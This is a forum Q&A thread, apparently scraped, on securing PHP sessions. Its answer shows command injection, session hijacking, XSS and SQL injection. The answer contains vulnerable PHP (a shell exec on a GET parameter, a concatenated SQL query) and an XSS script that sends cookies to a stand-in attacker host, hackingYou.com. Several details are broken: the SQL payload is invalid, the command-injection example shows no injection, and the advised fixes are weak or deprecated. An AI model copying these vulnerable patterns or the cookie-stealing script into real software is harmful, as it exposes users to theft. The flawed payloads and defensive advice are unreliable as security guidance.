I've been reading a lot of articles on owasp.org and one of things that I remember most and couldn't understand well is securing PHP sessions.
I couldn't understand well how securing sessions goes and therefore I am asking here. What are the best way to secure sessions in PHP?
Side question: Are file inputs vulnerable by XSS?
This is the source for PHP sessions hijacking: OWASP.org: PHP Security Cheat Sheet
分享 Here are some of the major issues to keep in mind:
Suppose you have a web page that allows user to see the contents of a folder (for example your a hosting company and showing the user their files on the server)
Here is some code that might make it happen:
$directory = $_GET['directory'];
exec("ls $directory", $result);
An attacker can exploit this by passing in other commands in to the url string, such as:
ls -LR
Each session has a unique ID, if an attacker gets a hold of it they can (potentially) use it to obtain confidential information.
To protect against this have the user reauthenticate (with their passwords) before doing anything sensitive (for example, if the user wants to reset their password, force them to enter the old password first)
Whenever you have a site with user generated content (a good example of this is comments on a blog), there is a potential threat that an attacker will place javaScript in to his content (read: his comment) that could potentially harm all users that come to the page.
Here is an example:
<script>
document.location = 'http://www.hackingYou.com/stealYourData.php?' + document.cookie;
</script>
This code will allow the attackers website (hackingYou.com) to steal the cookie that you have for the website you are currently visiting.
One way to protect against this is to remove any HTML from any string being inputted using the following command:
strip_tags($input);
(wouldn't be a decent answer without this one)
Suppose you have a web page that logs in users to a site. In order to log them in successfully you check for their record in a DB.
Here is how it might be coded:
$sql = "SELECT * FROM users WHERE username = $_GET['username'] and password = $_GET['password']";
An attacker can exploit this by entering in to the password field:
abcd OR WHERE 1 = 1
The resulting sql statement would look like this:
SELECT * FROM users WHERE username = hacker AND password = abcd OR WHERE 1 = 1;
This would spit out the full table of ALL usernames and passwords to the attacker.
To protect against this "sanitize" your input strings for SQL using the following command:
mysql_real_escape_string($input)
This is most of the basics, obviously one should always keep up to date by reading the latest security bulletins, such as:
分享
